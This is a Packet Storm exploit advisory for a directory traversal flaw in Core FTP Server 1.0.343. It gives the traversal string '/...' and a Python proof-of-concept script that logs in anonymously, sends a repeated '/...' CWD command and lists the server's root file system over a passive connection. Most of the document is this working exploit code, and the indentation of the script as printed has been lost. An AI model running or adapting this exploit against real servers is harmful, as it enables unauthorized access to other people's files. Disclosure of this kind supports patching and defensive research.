Core FTP Server 1.0.343 Directory Traversal

2010-05-28T00:00:00
ID PACKETSTORM:90043
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-28T00:00:00

Description

                                        
                                            `#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Directory Traversal #  
# Software.................Core FTP Server 1.0.343 #  
# Download.................http://coreftp.com/ #  
# Date.....................5/27/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a #  
# specially crafted URL. #  
# #  
# #  
# ##Exploit## #  
# #  
# /... #  
# #  
# #  
# ##Proof of Concept## #  
# #  
import sys, socket, re  
  
host = 'localhost'  
port = 21  
user = 'anonymous'  
password = 'a'  
  
buffer_size = 8192  
timeout = 8  
  
def recv(s):  
resp = ''  
  
while 1:  
r = s.recv(buffer_size)  
if not r: break  
resp += r  
  
return resp  
  
def list_root():  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.settimeout(timeout)  
  
print s.recv(buffer_size)   
  
s.send('USER ' + user + '\r\n')   
print s.recv(buffer_size)   
  
s.send('PASS ' + password + '\r\n')   
print s.recv(buffer_size) + s.recv(buffer_size)  
  
s.send('CWD ' + '/...' * 16 + '\r\n')  
  
resp = s.recv(buffer_size)  
  
print resp  
  
if resp[:3] == '250':  
s.send('PASV\r\n')   
resp = s.recv(buffer_size)  
  
print resp  
  
pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)  
  
if (pasv_info == None):  
print 'Invalid PASV response: ' + resp  
return   
  
s.send('LIST\r\n')   
  
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))  
s2.settimeout(timeout)   
  
print recv(s2)  
  
s.close()  
  
except Exception:   
print sys.exc_info()  
  
list_root()  
  
  
`